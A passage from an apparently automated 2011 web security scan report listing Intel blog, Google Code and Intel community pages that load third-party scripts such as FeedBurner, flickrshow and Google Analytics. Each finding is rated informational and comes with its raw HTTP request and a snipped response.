       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/pay_stock_and_benefits_yes_im_tripping.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.16. http://blogs.intel.com/jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:18 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=7024 t=1296947778767507
Vary: Accept-Encoding
Connection: close
Content-Length: 34050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</a>
   

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.17. http://blogs.intel.com/jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5699 t=1296947777549940
Connection: close
Content-Length: 38836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.18. http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2010/12/why_non-techies_should_consider_intel.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/2010/12/why_non-techies_should_consider_intel.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=10275 t=1296947777188938
Connection: close
Content-Length: 35786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.19. http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=4760 t=1296947779216933
Vary: Accept-Encoding
Connection: close
Content-Length: 36265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.20. http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2011/01/top_ten_reasons_i_work_for_intel.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/2011/01/top_ten_reasons_i_work_for_intel.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5263 t=1296947779269283
Connection: close
Content-Length: 41979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.21. http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/2011/01/you_want_me_to_move_where.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/2011/01/you_want_me_to_move_where.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=4500 t=1296947778837871
Connection: close
Content-Length: 33718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.22. http://blogs.intel.com/jobs/about-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/about-us/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/about-us/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=6041 t=1296947782477121
Connection: close
Content-Length: 64858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.23. http://blogs.intel.com/jobs/just-for-students/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/just-for-students/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/just-for-students/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:22 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=7672 t=1296947782408018
Vary: Accept-Encoding
Connection: close
Content-Length: 88344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.24. http://blogs.intel.com/jobs/life-at-intel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/life-at-intel/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/life-at-intel/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5613 t=1296947779536465
Connection: close
Content-Length: 72711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.25. http://blogs.intel.com/jobs/your-future/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/your-future/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/your-future/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=4807 t=1296947779399903
Connection: close
Content-Length: 38135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<div class="widget-flickr">
<script type="text/javascript" src="http://v6.flickrshow.com/scripts/"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.26. http://blogs.intel.com/research/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /research/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/11/enhancing_everyday_experiences.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/11/future_lab_protecting_privacy.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/12/future_lab_better_photos.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/12/future_lab_the_future_of_tv.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/future_lab_connected_home.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/future_lab_sleep_science.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/future_lab_visual_computing_la.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/intel_launches_istc_on_visual.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/intel_science_technology_cente.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/02/opsis.php
  • http://www.google-analytics.com/urchin.js

Request

GET /research/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=21677 t=1296947772895448
Vary: Accept-Encoding
Connection: close
Content-Length: 38839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/02/opsis.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/future_lab_visual_computing_la.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/intel_science_technology_cente.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/intel_launches_istc_on_visual.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/future_lab_sleep_science.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2011/01/future_lab_connected_home.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/12/future_lab_the_future_of_tv.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/12/future_lab_better_photos.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/11/future_lab_protecting_privacy.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/research/2010/11/enhancing_everyday_experiences.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.27. http://blogs.intel.com/technology/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /technology/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2010/12/wow_2010_is_over_2011.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/as_i_reflect_on_my.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/chipset_design_flaw.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/geo_social_ces_winners_and_los.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/intel_insider_-_what_is_it_no.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/play_time_-_why_games_matter.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/sandybridge_on_linux_-_it_will.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/smart_tv_where_its_heading_in.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/visibly_smart_features_inside.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/02/building_world_class_communiti.php
  • http://www.google-analytics.com/urchin.js

Request

GET /technology/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:09 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=5787 t=1296947769507872
Vary: Accept-Encoding
Connection: close
Content-Length: 80072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>
   

                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/02/building_world_class_communiti.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

   
                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/chipset_design_flaw.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

   
                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/as_i_reflect_on_my.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/smart_tv_where_its_heading_in.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

   
                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/geo_social_ces_winners_and_los.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

   
                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/play_time_-_why_games_matter.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/visibly_smart_features_inside.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

   
                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/sandybridge_on_linux_-_it_will.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

   
                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2011/01/intel_insider_-_what_is_it_no.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
   

                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/technology/2010/12/wow_2010_is_over_2011.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.28. http://code.google.com/p/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/simplemodal/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.gstatic.com/codesite/ph/3463025281934143195/js/core_scripts_20081103.js
  • http://www.gstatic.com/codesite/ph/3463025281934143195/js/prettify.js

Request

GET /p/simplemodal/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=a7fb3fbbcf17b918:TM=1296947840:LM=1296947840:S=gIUVNf4Re7eiOItb; expires=Mon, 04-Feb-2013 23:17:20 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...
</table>
<script src="http://www.gstatic.com/codesite/ph/3463025281934143195/js/prettify.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3463025281934143195/js/core_scripts_20081103.js"></script>
...[SNIP]...

18.29. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.gstatic.com/codesite/ph/3463025281934143195/js/core_scripts_20081103.js
  • http://www.gstatic.com/codesite/ph/3463025281934143195/js/prettify.js

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:22 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=7e8aad9ba4ff032e:TM=1296947843:LM=1296947843:S=KYp7vW6FHX8bFUHr; expires=Mon, 04-Feb-2013 23:17:23 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...
</table>
<script src="http://www.gstatic.com/codesite/ph/3463025281934143195/js/prettify.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3463025281934143195/js/core_scripts_20081103.js"></script>
...[SNIP]...

18.30. http://communities.intel.com/community/openportit/server  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /community/openportit/server

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /community/openportit/server HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=C3BB5A4A6127C798AA423278CD19252D.node6OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 876
Content-Language: en-US
CacheHit: D=884319 t=1296947757183516
X-JSL: D=884325 t=1296947757183516
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.31. http://communities.intel.com/community/openportit/vproexpert  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /community/openportit/vproexpert

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.google-analytics.com/urchin.js
  • http://www.vproexpert.com/E24VZ/sdmenu/sdmenu.js

Request

GET /community/openportit/vproexpert HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=106FD2976BE417AFAD454527A8018E4E.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323030353b; Expires=Mon, 07-Mar-2011 23:15:59 GMT; Path=/
X-JAL: 255
Content-Language: en-US
CacheHit: D=264764 t=1296947757157494
X-JSL: D=264770 t=1296947757157494
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

